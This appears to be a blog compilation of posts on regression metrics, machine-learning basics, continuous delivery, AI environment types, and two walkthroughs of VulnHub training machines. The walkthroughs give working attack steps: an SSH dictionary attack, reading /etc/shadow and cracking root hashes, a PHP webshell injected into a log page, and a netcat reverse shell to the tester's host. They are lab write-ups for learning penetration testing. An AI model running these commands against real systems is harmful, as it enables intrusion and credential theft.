AI (III): Regression

Regression is one of the techniques we can find in the supervised learning paradigm.

Let’s suppose we have some historical data from participants in alcohol-effects trials: the amount of alcohol each of them ingested before showing symptoms of drunkenness. In addition, we have some data about the participants themselves, like weight and height.

Now, we want to explore how we could use machine learning to predict how much alcohol a person can ingest before getting drunk.

When we need to predict a numeric value, like an amount of money, a temperature or, in this case, a number of milliliters, we use a supervised learning technique called regression.

Let’s take one of the participants in our study and check the data that is interesting for us. To keep it simple, let’s take just age, weight, height and percentage of body fat.

What we want is to find a model that can calculate the amount of alcohol a person can drink before showing symptoms of drunkenness.

Age: 30. Weight: 90 kg. Height: 180 cm. Body fat: 23%. Alcohol: 125 ml.

ƒ([30, 90, 180, 23]) = 125

So we need our algorithm to learn the function that operates on all of the participant’s features to give us a result: an amount of alcohol in milliliters.

Of course, a sample of only one person is not likely to give us a function that generalizes well. We need to gather the same sort of data from lots of diverse participants and train our model based on this larger set of data.

ƒ([X1, X2, X3, X4]) = Y

After we have trained the model and we have a generalized function that can be used to calculate our label Y, we can plot the values of Y calculated for specific X values on a chart, and we can interpolate any new value of X to predict an unknown Y.
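As an illustration, here is a minimal sketch of how such a model could be trained, assuming scikit-learn is available; all the data points beyond the participant above are invented for the example.

# Minimal sketch: fit a regression model on invented participant data.
from sklearn.linear_model import LinearRegression

# Features: [age, weight (kg), height (cm), body fat (%)]
X = [
    [30, 90, 180, 23],
    [25, 70, 175, 18],
    [40, 85, 170, 30],
    [35, 60, 165, 22],
]
# Label: milliliters of alcohol ingested before symptoms appeared
y = [125, 100, 95, 80]

model = LinearRegression().fit(X, y)

# Interpolate: predict the label for a new, unseen participant
print(model.predict([[28, 80, 178, 20]]))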


We can use part of our study data to train the model and withhold the rest of the data for evaluating model performance.

Now we can use the model to predict f of x for evaluation data, and compare the predictions or scored labels to the actual labels that we know to be true.

There can be differences between the predicted and the actual labels; these are what we call the residuals, and they tell us something about the level of error in the model.


There are a few ways we can measure the error in the model, and these include root-mean-square error, or RMSE, and mean absolute error, or MAE. Both of these are absolute measures of error in the model.

RMSE = √(∑(score – label)^2 / n)

MAE = 1/n ∑ abs(score – label)

For example, an RMSE value of 5 would mean that the standard deviation of the residuals on our test data is 5 milliliters.
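As a quick sketch of how these two metrics are computed, using invented labels and scores:

import math

# Invented actual labels and model predictions, for illustration only
labels = [125, 100, 95, 80]
scores = [120, 104, 90, 86]

n = len(labels)
residuals = [s - l for s, l in zip(scores, labels)]

# Root-mean-square error and mean absolute error
rmse = math.sqrt(sum(r ** 2 for r in residuals) / n)
mae = sum(abs(r) for r in residuals) / n

print(f"RMSE: {rmse:.2f}, MAE: {mae:.2f}")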

The problem is that absolute values can vary wildly depending on what you are predicting. An error of 5 can mean nothing in one model but be a big difference in a different one. So we might want to evaluate the model using relative metrics, which indicate a more general level of error as a relative value between 0 and 1.

Relative absolute error, or RAE, and relative squared error, or RSE, produce a metric where the closer to 0 the error, the better the model.

RAE = ∑ abs(score – label) / ∑ label

RSE = √(∑(score – label)^2 / ∑ label^2)

And the coefficient of determination, which we sometimes call R squared, is another relative metric, but this time a value closer to 1 indicates a good fit for the model.

CoD (R^2) = 1 – var(score – label) / var(label)
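Following the formulas above (and the same invented numbers as before), the relative metrics can be sketched like this:

import statistics

labels = [125, 100, 95, 80]
scores = [120, 104, 90, 86]
residuals = [s - l for s, l in zip(scores, labels)]

# Relative absolute error: total absolute error relative to the labels
rae = sum(abs(r) for r in residuals) / sum(labels)

# Relative squared error: total squared error relative to the squared labels
rse = (sum(r ** 2 for r in residuals) / sum(l ** 2 for l in labels)) ** 0.5

# Coefficient of determination (R squared), as defined above
r2 = 1 - statistics.variance(residuals) / statistics.variance(labels)

print(f"RAE: {rae:.3f}, RSE: {rse:.3f}, R^2: {r2:.3f}")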


AI (I): Machine learning

Machine learning provides the foundation for artificial intelligence. So, what is it?

Machine learning is a technique in which we train a software model using data. The model learns from the training cases and then, we can use the trained model to make predictions for new data cases. To have a computer make intelligent predictions from the data, we just need a way to train it to perform the correct calculations.

We usually start with a data set that contains historical records, often called cases or observations. Each observation includes numeric features that quantify a characteristic of the item we are working with; we can call them ‘X’. In addition, we also have some value that we are trying to predict; we can call it ‘Y’. The purpose is to use our training cases to train a machine learning model so it can calculate a value for ‘Y’ from the features in ‘X’. As a simplification, we are creating a function that operates on a set of features, ‘X’, to produce predictions, ‘Y’.

Generally speaking, there are two broad kinds of machine learning, supervised and unsupervised.

In supervised learning scenarios, we start with observations that include known values for the variable we want to predict; these values are called labels. Because we already know the label we are trying to predict, the first thing we need to do is to split our data. In this way, we can train the model using half of the data and keep the rest to test the performance of our model. When we obtain the desired results and we are confident our model works, we can use it with new observations for which the label is unknown, and generate new predicted values.
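For instance, assuming scikit-learn, the split could be sketched like this, with placeholder data:

from sklearn.model_selection import train_test_split

# Placeholder features and known labels
X = [[30, 90, 180, 23], [25, 70, 175, 18], [40, 85, 170, 30], [35, 60, 165, 22]]
y = [125, 100, 95, 80]

# Train on half of the data, keep the other half for testing
X_train, X_test, y_train, y_test = train_test_split(
    X, y, test_size=0.5, random_state=42
)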

Unsupervised learning is different from supervised learning, in that this time we do not have known label values in the training data set. We train the model by finding similarities between the observations. After the model is trained, each new observation is assigned to the cluster of observations with the most similar characteristics.
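A minimal unsupervised sketch, again assuming scikit-learn and invented observations:

from sklearn.cluster import KMeans

# Unlabeled observations: only features, no known 'Y'
X = [[1.0, 2.0], [1.1, 1.9], [8.0, 8.2], [7.9, 8.1]]

# Group the observations into two clusters by similarity
model = KMeans(n_clusters=2, n_init=10, random_state=0).fit(X)

# A new observation is assigned to the most similar cluster
print(model.predict([[1.05, 2.1]]))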


CD: Continuous Delivery

Nowadays, our development teams use Agile methodologies, which means that we have accelerated our processes, trying to deliver small chunks of functionality to receive early, real feedback from users and keep iterating on our ideas.

Now, we are an organization that follows Continuous Integration practices but we are still missing something. We are not able to receive this feedback if it takes ages between our developers finishing their tasks and the code being deployed into production, where our users can use it. In addition, when a lot of changes or features are delivered at the same time, it becomes more difficult to debug and solve possible errors. For a long time, the deployment process has been seen as a risky process that requires a lot of preparation but this needs to change if we want to be truly Agile.

Here is where Continuous Delivery (CD) comes in. Continuous Delivery is a practice that tries to make tracking and deploying software trivial. The goal is to ship changes to our users early and often, multiple times a day if possible, to help us minimize the risk of releasing and to give our developers the opportunity to get feedback as soon as possible.

As I have said before, we should already have a Continuous Integration environment to ensure that all changes pushed to the main repository are tested and ready to be deployed. Can it be done without a CI environment? Yes, probably, but more probably we are just going to create a machine that pushes our bugs faster to production, increasing our risks.

Steps we need to take

Create a continuous delivery pipeline

The continuous delivery pipeline is the list of steps that happen every time our code changes, until it finds its way to production. It includes building and testing the application as part of the CI process and extends it with the ability to deploy to, and test, staging and production environments.

With this we will achieve two things:

  • Our code will be always ready to be deployed to production.
  • Releasing changes will be as simple as clicking a button.
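A hypothetical sketch of such a pipeline, written as a simple script that stops at the first failing step; the commands are placeholders for whatever our stack uses:

# Hypothetical pipeline sketch: each step must succeed before the next runs.
import subprocess
import sys

STEPS = [
    ["make", "build"],                     # build the application
    ["make", "test"],                      # run the CI test suite
    ["./deploy.sh", "staging"],            # deploy to the staging environment
    ["./acceptance_tests.sh", "staging"],  # test the staging deployment
]

for step in STEPS:
    print("Running:", " ".join(step))
    if subprocess.run(step).returncode != 0:
        sys.exit("Pipeline stopped: '" + " ".join(step) + "' failed")

In a real setup the same steps would live in the CI platform’s configuration instead of a hand-rolled script, but the idea is the same: a fixed, ordered list of steps that halts on the first failure.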

Create a staging environment

All of us, generally, have written code at some point in our lives; some of us still do, some of us have evolved our careers but, something I am sure all of us remember are those cases of “it worked on my machine…”. Configurations, differences in environments, networks… There are thousands of things that can be different and can go wrong and, probably, they will. No matter how many tests we run locally or how many precautions we take, our local conditions are not going to be the same as our production conditions. For this reason, we need an intermediate environment: the “staging” environment.

The “staging” environment does not need to support the same scale as our production environment but it should be as close as possible to the production configuration to ensure that the software is tested in similar conditions.

The “staging” environment should allow us to see things before they happen. If something is going to break, it should break in this environment. Using this environment, our release workflow should be similar to:

  1. Developers build and test a feature locally.
  2. Developers push their changes to the main repository where CI tests run automatically against their commits.
  3. If the build is green, the changes are released to the staging environment.
  4. Acceptance tests are run against the staging environment to make sure nothing is broken.
  5. Changes are now ready to be deployed to production.

An additional advantage is that it allows our QA team and product owners to verify the software works as intended before releasing to our users, and without requiring a special deployment or access to a local developer machine.

Automate our deployment

In other words, we need to create a “green button” that, once pressed, deploys our code to staging or production without any other human intervention.

We can start by building some scripts that we run from our development machines and, after that, we can add them to any CI platform.

There are many ways to deploy software, but there are common rules that maybe we can use as guidance:

  • Version the deployment scripts with our code. That way we will be able to audit changes to our deployment configuration easily if necessary.
  • Do not store passwords in our scripts. Instead, use environment variables that can be set before launching the deployment script (see the sketch after this list).
  • Use SSH keys when possible to access the deployment servers. They will allow us to connect to our servers without providing a password and will resist a brute force attack.
  • Make sure that any build tools involved in the pipeline do not prompt for user input. Use a non-interactive mode or provide an option to automatically assume yes when installing dependencies.
  • Test it, test it and test it again. Make sure everything deploys as expected and that nothing is missing, no matter what kind of changes you are making.
  • Maybe it is a good moment to write some smoke tests, if you do not have them, to check that your machines are up and running.
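As an illustration of the environment-variable and smoke-test points above, a fragment of a deployment script could look like this; the variable names and the URL are placeholders:

import os
import sys
import urllib.request

# Read credentials from the environment instead of hard-coding them
# (placeholder variable names)
deploy_user = os.environ["DEPLOY_USER"]
deploy_token = os.environ["DEPLOY_TOKEN"]

# ... the actual deployment steps would go here ...

# Minimal smoke test: check that the deployed application answers at all
# (placeholder URL)
try:
    with urllib.request.urlopen("https://staging.example.com/health", timeout=10) as resp:
        if resp.status != 200:
            sys.exit(f"Smoke test failed: HTTP {resp.status}")
except OSError as exc:
    sys.exit(f"Smoke test failed: {exc}")

print("Deployment verified")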

Include data structure changes

Let’s face it: when our application changes, the code is not the only thing changing. The data structures change too. And we are not going to have a CD environment if these changes are not added to our automatic deployments.

First, create backups. No matter how good we are or how small the change is, something is going to fail at some point and we want to be able to restore the previous state of the application.

Second, there are multiple tools that can help us manage data structure changes as code. Some frameworks bring their own to the table but, if not, we can find tools that fit our technologies and ideas. We just need to learn them and use them.
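As a toy illustration of managing data structure changes as code, a minimal migration runner could track which scripts have already been applied; the sqlite database and the “migrations” folder are just for the example:

import sqlite3
from pathlib import Path

# Toy migration runner: apply .sql files in order, each one only once.
conn = sqlite3.connect("app.db")
conn.execute("CREATE TABLE IF NOT EXISTS schema_migrations (name TEXT PRIMARY KEY)")

applied = {row[0] for row in conn.execute("SELECT name FROM schema_migrations")}

for script in sorted(Path("migrations").glob("*.sql")):
    if script.name in applied:
        continue
    print("Applying", script.name)
    conn.executescript(script.read_text())
    conn.execute("INSERT INTO schema_migrations (name) VALUES (?)", (script.name,))
    conn.commit()

Real tools add much more (rollbacks, checksums, locking), which is why learning an existing one is usually better than maintaining our own.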

All together, and the last detail: the CI server

Arriving here, we have set up a CI environment with a CI server and we have a “button” to run our deployments so, why not put everything together?

To do this, we just need to add a manual step in our pipeline to release (press the button) the code to our different environments.

Now, every time our code is merged and ready for production, following business needs, we just need to push the button and release. This gives us great control over our deployments. The only precaution we need to take is not to leave too many commits accumulated.


WALKTHROUGH: De-ICE: S1.100

The purpose of this article is to describe, for educational purposes (see disclaimer), the pentesting of a vulnerable image created for training purposes called “De-ICE: S1.100”.

Information

https://www.vulnhub.com/entry/de-ice-s1100,8/

Scenario

The scenario for this LiveCD is that a CEO of a small company has been pressured by the Board of Directors to have a penetration test done within the company. The CEO, believing his company is secure, feels this is a huge waste of money, especially since he already has a company scan their network for vulnerabilities (using nessus). To make the BoD happy, he decides to hire you for a 5-day job; and because he really doesn’t believe the company is insecure, he has contracted you to look at only one server – an old system that only has a web-based list of the company’s contact information.

The CEO expects you to prove that the admins of the box follow all proper accepted security practices, and that you will not be able to obtain access to the box. Prove to him that a full penetration test of their entire corporation would be the best way to ensure his company is actually following best security practices.

Configuration

PenTest Lab Disk 1.100: This LiveCD is configured with an IP address of 192.168.1.100 – no additional configuration is necessary.

Download

ISO image

I am going to skip the configuration process because it is trivial and it is not the purpose of this article.

All the tools used for this article are installed, or can be installed, in a Kali Linux distribution.

Once we have both machines running, our Kali Linux and the training image, the first step should be checking that they are on the same network and that we can see the training machine from the testing machine. We can use the “ping” command (which, in this case, is going to fail) or the “netdiscover” command, just to name a couple. In my case, I have used “netdiscover”:

netdiscover -i eth1 -r 192.168.1.0/24
Figure 1. Netdiscover execution result

After we are sure we can reach the training machine, the first step is to take a look around, checking the web page that is available. We can see a brief explanation about the challenge and not much more than that. But we can see a very important thing here: reading the page carefully, we can see there are some emails related to the company.

Head of HR: Marie Mary - marym@herot.net (On Emergency Leave) 
Employee Pay: Pat Patrick - patrickp@herot.net
Travel Comp: Terry Thompson - thompsont@herot.net
Benefits: Ben Benedict - benedictb@herot.net
Director of Engineering: Erin Gennieg - genniege@herot.net
Project Manager: Paul Michael - michaelp@herot.net
Engineer Lead: Ester Long - longe@herot.net
Sr. System Admin: Adam Adams - adamsa@herot.net
System Admin (Intern): Bob Banter - banterb@herot.net
System Admin: Chad Coffee - coffeec@herot.net

We should pay special attention to the last three because they are admin users.

This gives us some useful information:

  • Names of people working in the company.
  • Valid emails.
  • Examples of how they are creating usernames.

It is time to start exploring what the training system is offering. For this purpose, I am going to use “nmap”.

nmap -p 1-65535 -T4 -A -v 192.168.1.100
Figure 2. nmap results

As we can see, there are a few ports open in the training machine:

  • 21: FTP service. And, something is not right here.
  • 22: SSH service
  • 25: SMTP service
  • 80: HTTP service
  • 110: POP3 service
  • 143: IMAP service

Considering we do not have any other information, we need to start thinking about what we are missing. We already have some valid emails; with this information we can create a list of possible users in the system. In addition, we can add users like “root” or “admin” and similar users that are always useful to have. In this case, our list can be something like:

root
admin
aadams adamsa adamsad adam.adams
bbanter banterb banterbo bob.banter
ccoffee coffeec coffeech chad.coffee
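Building these candidates by hand does not scale when there are more names, so here is a quick sketch that generates the same patterns from the names found on the contact page:

# Quick sketch: derive common username patterns from the names found
# on the contact page.
names = [("adam", "adams"), ("bob", "banter"), ("chad", "coffee")]

candidates = ["root", "admin"]
for first, last in names:
    candidates += [
        first[0] + last,     # aadams
        last + first[0],     # adamsa
        last + first[:2],    # adamsad
        first + "." + last,  # adam.adams
    ]

with open("users.txt", "w") as f:
    f.write("\n".join(candidates) + "\n")

The resulting “users.txt” is the list we feed to the next step.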

Now that we have a list of possible users, we can try to connect to the SSH service. For this, we are going to use the tool “medusa” to run a dictionary attack and see if we are lucky.

medusa -h 192.168.1.100 -U users.txt -P passwds.txt -M ssh -v 4 -w 0
Figure 3. medusa result

As we can see, we have been able to break one password. Let’s use it and try to connect using SSH.

ssh aadams@192.168.1.100
Figure 4. SSH connection with aadams

As we can see, we are able to connect. Now that we are inside, let’s see what “sudo” commands we have available.

sudo -l
Figure 5. Available tools

We can see we can use the tool “cat” to read file content. Then, let’s check the files “/etc/passwd” and “/etc/shadow”.

Figure 6. /etc/shadow content

With a simple copy and paste, we can move the content of both files to our machine and try to use “John” to discover new passwords, especially the “root” password. After the copies are done, we can “unshadow” the files to have everything in one file.

unshadow passwd_file.txt shadow_file.txt > root_password.txt

Figure 7. Unshadowing the passwd and shadow files

Trying to save a little bit of time, and because we already have a working user, “aadams”, we can copy the “root” credential to a file and try to break just the “root” password.

john just_root.txt
Figure 8. John results

Great! We have the “root” password. Now we can try to connect with SSH using the “root” credentials.

ssh root@192.168.1.100
Figure 9. SSH connection as “root” failing

As we can see, we are not able to connect as the “root” user using SSH. But we still have the “root” password and a valid user, “aadams”. Let’s try to log in as “root” from our valid user:

Figure 10. We are root!

Usually, now that we are root, we could close the case and deliver our report but, going around a little bit, we can find an interesting file and, considering this is a training exercise, we can play a bit more. The file is this one:

Figure 11. Curious file
Figure 12. Encrypted file, maybe

binwalk salary_dec2003.csv.enc

Figure 13. Confirming it is an encrypted file

What do we know about the file?

  • It is encrypted with OpenSSL.
  • It was in a folder only accessible by the “root” user. We can think that maybe it is encrypted using the “root” password we have.
  • We do not know the type of cipher.

We can check the list of ciphers that OpenSSL offers:

openssl enc help
Figure 14. Available ciphers

Let’s try one of them out of curiosity, to see what an error looks like, and after that, let’s figure out how to try all of them to find the correct one.

openssl enc -d -aes-128-cbc -in salary_dec2003.csv.enc -out salary_dec2003.csv -k tarot
Figure 15. Decrypting the file

I guess it is because this is just a training environment but, in this case, the one that does the job is the first one; no more attempts are needed. In the real world, we would probably need to write a script to test all the available ciphers, something like the sketch below.
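A possible sketch, assuming a modern OpenSSL where “openssl enc -list” prints the supported ciphers; the file names and the recovered password are the ones used above. A zero exit status only means the decryption did not fail, so each candidate output still needs to be inspected:

import subprocess

# Ask OpenSSL for the cipher names it supports (OpenSSL 1.1.1+)
out = subprocess.run(["openssl", "enc", "-list"],
                     capture_output=True, text=True).stdout
ciphers = [word.lstrip("-") for word in out.split() if word.startswith("-")]

for cipher in ciphers:
    result = subprocess.run(
        ["openssl", "enc", "-d", "-" + cipher,
         "-in", "salary_dec2003.csv.enc",
         "-out", "salary_dec2003.csv",
         "-k", "tarot"],
        capture_output=True,
    )
    # Exit status 0 means decryption did not fail; inspect the output by hand
    if result.returncode == 0:
        print("Candidate cipher:", cipher)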

Figure 16. File decrypted

With this, our scenario finishes. We have access to the machine, we have root permissions and we have decrypted the “salary” file; our job is done. It has been interesting, but I think it was only possible because the passwords were not very strong.


Walkthrough: 21LTR: Scene 1

The purpose of this article is to describe, for educational purposes (see disclaimer), the pentesting of a vulnerable image created for training purposes called “21LTR: Scene 1”.

Information

https://www.vulnhub.com/entry/21ltr-scene-1,3/

Scene 1

Your pentesting company has been hired to perform a test on a client company’s internal network. Your team has scanned the network and you have been assigned one of the discovered systems. Perform a test on this system starting from the beginning of your chosen methodology and submit your report to the project manager at scenes AT 21LTR DOT com

Scope Statement

The client has defined a set of limitations for the pentest: – All tests will be restricted to the systems identified on the 192.168.2.0/24 network. – All commands run against the network and systems must be supplied in the form of script files packaged with the submission of the report – A final report indicating all identified vulnerabilities and exploits will be provided to the company’s engineering department within 90 days of the start of this engagement.

Configuration

Scenario Pentest Lab Scene 1:

This LiveCD is configured with an IP address of 192.168.2.120 – no additional configuration is necessary.

Download

ISO image

Torrent file (Magnet)

I am going to skip the configuration process because it is trivial and it is not the purpose of this article.

All the tools used for this article are installed, or can be installed, in a Kali Linux distribution.

Once we have both machines running, our Kali Linux and the training image, the first step should be checking that they are on the same network and that we can see the training machine from the testing machine. We can use the “ping” command or the “netdiscover” command, just to name a couple. In my case, I have used “netdiscover”:

netdiscover -i eth1 -r 192.168.2.0/24
Figure 1. Netdiscover execution result

After we are sure we can reach the training machine, the first step is to take a look around, checking the web page that is available. In this case, the web page gives us little information and nothing interesting but the source code of the page gives us the first good piece of information: in a comment, we can find some credentials.

Figure 2. Credentials found in the source code

There is nothing else to do here but, to be sure we are not missing some pages or folders, let’s run a different tool against the web page to check it. The tool is going to be “dirb”:

dirb http://192.168.2.120
Figure 3. dirb results

We can see that a couple of folders have been found, but the only one that seems to respond in the browser is “/logs”. Unfortunately, it returns a “Forbidden” error.

It is time to start exploring what the training system is offering. For this purpose, I am going to use “nmap”.

nmap -p 1-65535 -T4 -A -v 192.168.2.120
Figure 4. nmap results

As we can see, there are a few ports open in the training machine:

  • 21: FTP service
  • 22: SSH service
  • 80: HTTP service
  • 10001: At this point, I am not sure what this is. In addition, it does not always show up in the scanner results.

Considering we have some credentials, let’s try to connect to the different services. There is no luck with SSH access, but FTP allows us to connect and explore. Unfortunately, we can find just one file.

Figure 5. FTP exploration results

Considering we previously found a folder “/logs” and we have now found a file called “backup_log.php”, one good idea is to try the URL we can build with them:

http://192.168.2.120/logs/backup_log.php

Figure 6. Page content

It looks like some kind of backup log system, but it is not giving us enough information to do anything else.


At this point, I must admit that I was a bit lost and running out of ideas so, while I went for a walk, I left “Wireshark” running. Why? Because both are good ideas: going for a walk when you are blocked, and watching the network because you never know what you can find in it. After taking a look at the traffic, I saw some (a lot of) calls asking for the IP address “192.168.2.240”.

Figure 7. Wireshark results

At this point, I decided to change the IP of my testing machine to this address and turn “Wireshark” on again to see what happens and, this time, there is one interesting event: apparently, the training machine wants to establish a connection with “192.168.2.240” (my machine now) on port 10000.

Figure 8. Wireshark results

Then, let’s allow this connection to see what happens. To do this, let’s execute “netcat” and wait again:

nc -lvvp 10000 > output

Here we can see that the connection is made at some point and we receive what looks like a binary file, saved as “output”. After some investigation, we can see it is a “tar.gz” file (using exiftool). We cannot find anything interesting inside, but it is clear that it is a backup file.

Figure 9. Wireshark result

exiftool --list output

Figure 10. exiftool result
Figure 11. Exploring backup file

Linking the facts that the “nmap” scan showed a port 10001 we do not know anything about, that the server has a page showing backup result messages and that we are obviously downloading a backup file, we can infer that maybe port 10001 only opens when the machine is waiting for a response about the sent backup. To test this theory, let’s try to connect to port 10001 when the backup is sent. Because we do not know when it is going to be sent, let’s just try to connect multiple times:

while true; do nc -v 192.168.2.120 10001 && break; sleep 1; clear; done

After a few minutes, the connection is established and we can type a few instructions.

Figure 12. Wireshark results

Apparently, they do nothing but, when we go again to the backup log messages page, we can see what we have been typing.

Figure 13. Messages typed

Then, let’s try to type something that allows us to do something useful and gain access to the training machine. Let’s try to inject a PHP one-line webshell:

<?php echo exec($_GET["cmd"]);?>

And run something to check if it is working:

curl --silent 192.168.2.120/logs/backup_log.php?cmd=id
Figure 14. Connection result

As we can see (at the end of the image), we are connected as “apache” to the training machine. Now, let’s try to get a proper shell where we can execute commands and take a proper look at the system. We are going to listen on a port on our system and connect to it with a shell process from the training machine:

nc -lvvp 443
curl --silent 192.168.2.120/logs/backup_log.php?cmd=/usr/bin/nc%20192.168.2.240%20443%20-e%20/bin/sh #

And, success, we have our shell.

Figure 15. Shell in the training machine

The next step is to try to find the credential files and see their content but, unfortunately, we can only list the file “/etc/passwd”; the credentials are (I guess) in “/etc/shadow”, which we cannot list.

Our next step is to go around the machine to see what we can find. In this case, after some exploration, we can find a folder “/media/USB_1/Stuff/Keys” with two very interesting files:

  • authorized_keys: with the keys of the users authorized to connect with SSH. In this case, “hbeale”.
  • id_rsa: the private key to connect over SSH.
Figure 16. User with SSH access
Figure 17. Private key

Copying the key to our system, we can try to connect:

ssh hbeale@192.168.2.120
Figure 18. SSH access

Let’s check what commands we can execute with “sudo”. We can see we can use the tool “cat” to read file content:

sudo -l
Figure 19. Available tools

Then, let’s check the file “/etc/shadow” again.

Figure 20. /etc/shadow content

Here we can see the hash for the “root” user, which we copy to a file on our system (root_password). Let’s try to escalate our privileges by cracking the hash with “John” (the tool John the Ripper), using one of the dictionaries that comes with Kali:

john --wordlist=rockyou.txt root_password
Figure 21. John’s execution

We are lucky: John has done its job properly and we have the password “formula1”. Let’s try it.

Figure 22. We are root!

With this, our scenario finishes. We have access to the machine and we have root permissions; our job is done. It has been fun and frustrating but I do not think there would be the first without the second.


Artificial Intelligence: Types of environments

Let’s first describe what is an agent in artificial intelligence. An intelligent agent is an autonomous entity which observes through sensors and acts upon an environment using actuators and directs its activity towards achieving goals. Intelligent agents may also learn or use knowledge to achieve their goals. They may be very simple or very complex.

When designing artificial intelligence solutions, we need to consider aspects such as the characteristics of the data (classified, unclassified, …), the nature of the learning algorithms (supervised, unsupervised, …) and the nature of the environment on which the AI solution operates. We tend to spend large amounts of time on the first two aspects but, it turns out, the characteristics of the environment are one of the absolutely key elements in determining the right models for an AI solution. Understanding the characteristics of the environment is one of the first tasks we need to do. From this point of view, we can consider several categories.

Fully vs Partially observable

An environment is called fully observable if what your agent can sense at any point in time is completely sufficient to make an optimal decision. For example, imagine a card game where all the cards are on the table: the momentary sight of all those cards is really sufficient to make an optimal choice.

An environment is called partially observable when you need memory on the side of the agent to make the best possible decision. For example, in poker the cards are not openly on the table, and memorizing past moves will help you make a better decision.

Deterministic vs Stochastic

A deterministic environment is one where your agent’s actions uniquely determine the outcome. For example, in chess there is really no randomness when you move a piece: the effect of moving a piece is completely predetermined and, no matter how many times I make the same move, the outcome is the same.

In a stochastic environment there is a certain amount of randomness involved. Games that involve dice are stochastic: while you can still deterministically move your pieces, the outcome of an action also involves throwing the dice, and you cannot predict it.

Discrete vs Continuous

A discrete environment is one where you have finitely many action choices and finitely many things you can sense. For example, chess has finitely many board positions and finitely many things you can do.

A continuous environment is one where the space of possible actions or things you can sense may be infinite. In the game of darts, when throwing a dart we have infinitely many ways to angle it and to accelerate it.

Benign vs Adversarial

In benign environments, the environment might be random, it might be stochastic, but it has no objective of its own that would contradict your own objective. Weather is benign: it might be random, it might affect the outcome of your actions, but it is not really out there to get you.

In adversarial environments, the opponent is really out to get you. In chess, the environment has the goal of defeating you. Obviously, it is much harder to find good actions in adversarial environments, where the opponent actively observes you and counteracts what you are trying to achieve, than in benign environments.

I have seen a few more classifications or specifications but, more or less, all of them list the same categories or very similar ones.

Note: Article based on my notes of the course Intro to Artificial Intelligence | Udacity
